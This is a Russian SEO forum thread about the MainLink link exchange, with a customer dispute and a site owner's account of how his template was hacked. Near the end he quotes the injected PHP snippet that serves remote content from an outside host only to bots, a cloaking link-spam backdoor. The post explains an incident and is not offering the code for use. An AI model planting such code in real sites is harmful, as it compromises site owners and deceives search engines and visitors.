МайнЛинк (mainlink) - стабильный доход навсегда!

mainlink
На сайте с 10.10.2006
253
Ramzzes:
Видите, вы даже сейчас пытаетесь намекнуть на некоторое тугодумие своего клиента. Или придраться к сайту клиента, что вы тоже тут уже неоднократно пытались сделать. Это собственно и есть тот самый непрофессинализм, и жаль, что вы этого не понимаете.

ой передергиваете и ищите то, чего нет.

Клиент был и остается прав. Ситуация конкретно с сайтом весьма интересная, и специалисты с ней разбираются, причем тут отношение к клиенту?

Вам пописать тут хочется очень? Или все же по делу?

Продвижение сайта с оценкой качества каждой ссылки - SeoHammer | Коммерческий недорогой трафик для интернет-магазинов - ShopContext | Для экстренной связи поскрипывает телега @mainlink
Ramzzes
На сайте с 05.10.2012
108
mainlink:
ой передергиваете и ищите то, чего нет.

Клиент был и остается прав. Ситуация конкретно с сайтом весьма интересная, и специалисты с ней разбираются, причем тут отношение к клиенту?

Вам пописать тут хочется очень? Или все же по делу?

А что собственно не по делу?

И что же с самого начала попытаться разобраться с проблемой клиента? Я тоже видимо с этим вашим Ленивым Зэ как то общался, тот же самый высокомерный стиль общения, и вместо попытки вникнуть в проблему клиента, желание доказать что это клиент баран, а в системе все отлично.

Как то неприятно, знаете ли.

mainlink
На сайте с 10.10.2006
253

Ramzzes, теперь знаю. тема раскрыта?

Ramzzes
На сайте с 05.10.2012
108
mainlink:
Ramzzes, теперь знаю. тема раскрыта?

Ну чтож, надеюсь что в результате этого знания что-нибудь когда-нибудь у вас изменится в лучшую сторону. Всего доброго.

GoodChoice
На сайте с 28.02.2009
102

Есть ли возможность у Оптимизатора расставлять ссылки только на своих сайтах которые добавлены в панели Вебмастера?

В какой то бирже видел подобное.

mainlink
На сайте с 10.10.2006
253

GoodChoice, создайте свой вайт-лист с этими сайтами и подключайте его для покупки.

GoodChoice
На сайте с 28.02.2009
102
mainlink:
GoodChoice, создайте свой вайт-лист с этими сайтами и подключайте его для покупки.

В таком случае, как будет происходить взаиморасчёт? Процент мне все равно выплачивать придется или в данном случае сервис предоставит бесплатное размещение?

mainlink
На сайте с 10.10.2006
253
GoodChoice:
В таком случае, как будет происходить взаиморасчёт? Процент мне все равно выплачивать придется или в данном случае сервис предоставит бесплатное размещение?

размещение бесплатное.

mainlink
На сайте с 10.10.2006
253

Проблема, которая была пару страниц назад решена.

На сайте был установлен скрипт, который ротировал случайные ссылки (пользователь об этом не сообщил, но в итоге это обнаружилось), но при этом они подставлялись для определенных user-агентов, и поэтому на сайте появлялись доп. внешние ссылки.

Теперь тема полностью раскрыта. Всем спасибо.

Alex91
На сайте с 30.12.2007
258

mainlink, опять переиначили. Вы просили рассказать о ситуации на форуме - так рассказывайте детально. Нет никаких моих скриптов, о которых я бы мог умолчать.

Дело в том, что шаблон был взломан, причем, похоже, не нашими умельцами, а ребятами из-за бугра. При ручной проверке и проверке html кода готовой страницы никаких лишних ссылок на показывалось, что, на первый взгляд, отвергало идею взлома, о чем я писал в тикете, и на чем фокусировал внимание. Я не исключал эту идею, но для ее проверки нужно было узнать, что это за ВС, которые магическим образом исчезают во время ручной проверки. Моя вина в том, что сайт взломали, но не в том, что я умолчал о чем-то, о чем знал или специально затеял всю эту канитель.

Я лишь хочу, чтобы в базе на всех страницах показывалось верное количество внешних ссылок (и вопрос в том, какие ссылки видит ваш робот, если сайт вдруг взломан или еще что-то, потому что при ручном обновлении функциями вашей биржи их становится 0), больше мне ничего не надо.
Предположения:
1) Сайт не держит нагрузку при сканировании и хостинг может добавлять какие-то страницы с предупреждениями, где есть ВС
2) На сайте есть другие скрипты каких-то бирж, где могут подставляться ссылки (в скрытом виде или как-то еще - не знаем)
3) Что-то еще, известное пока, возможно, только вам.
По 1) - 3) - причин для появления вс на этом сайте я не вижу (не знаю)

Оказалось, что в шаблон в один из файлов уже несколько месяцев вставлен скрипт, который проверяет юзерагент посетителя (что само по себе не новость), но ориентирован только на ботов.

<?php
if(preg_match('/Google Web Preview|bot|spider|wget/i',$_SERVER['HTTP_USER_AGENT'])){
echo file_get_contents('http://wedlink.buklsainsa.org/kc.txt');
}
?>

И внешние ссылки в системе появились из-за того, что сканирующий бот mainlink, видимо, содержит в нем что-то из "bot|spider|wget", а бот, который в дальнейшем проверяет внешние ссылки через ручную проверку - их не содержит.

Если бы Вы, mainlink, действительно хотели рассказать о том, что случай "довольно интересный", то стоит рассказать про эту разницу для ваших ботов. Хотя случай, безусловно, довольно банальный - взлом, пусть и хитрый. И все, что стоило сделать, чтобы решить вопрос, почему два разных ваших бота видят разное количество ВС - это запросить лог сканирования одной страницы, что, в конечном счете, и было сделано.

Проблема решена, всем не болеть.

C Уважением, Алексей

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий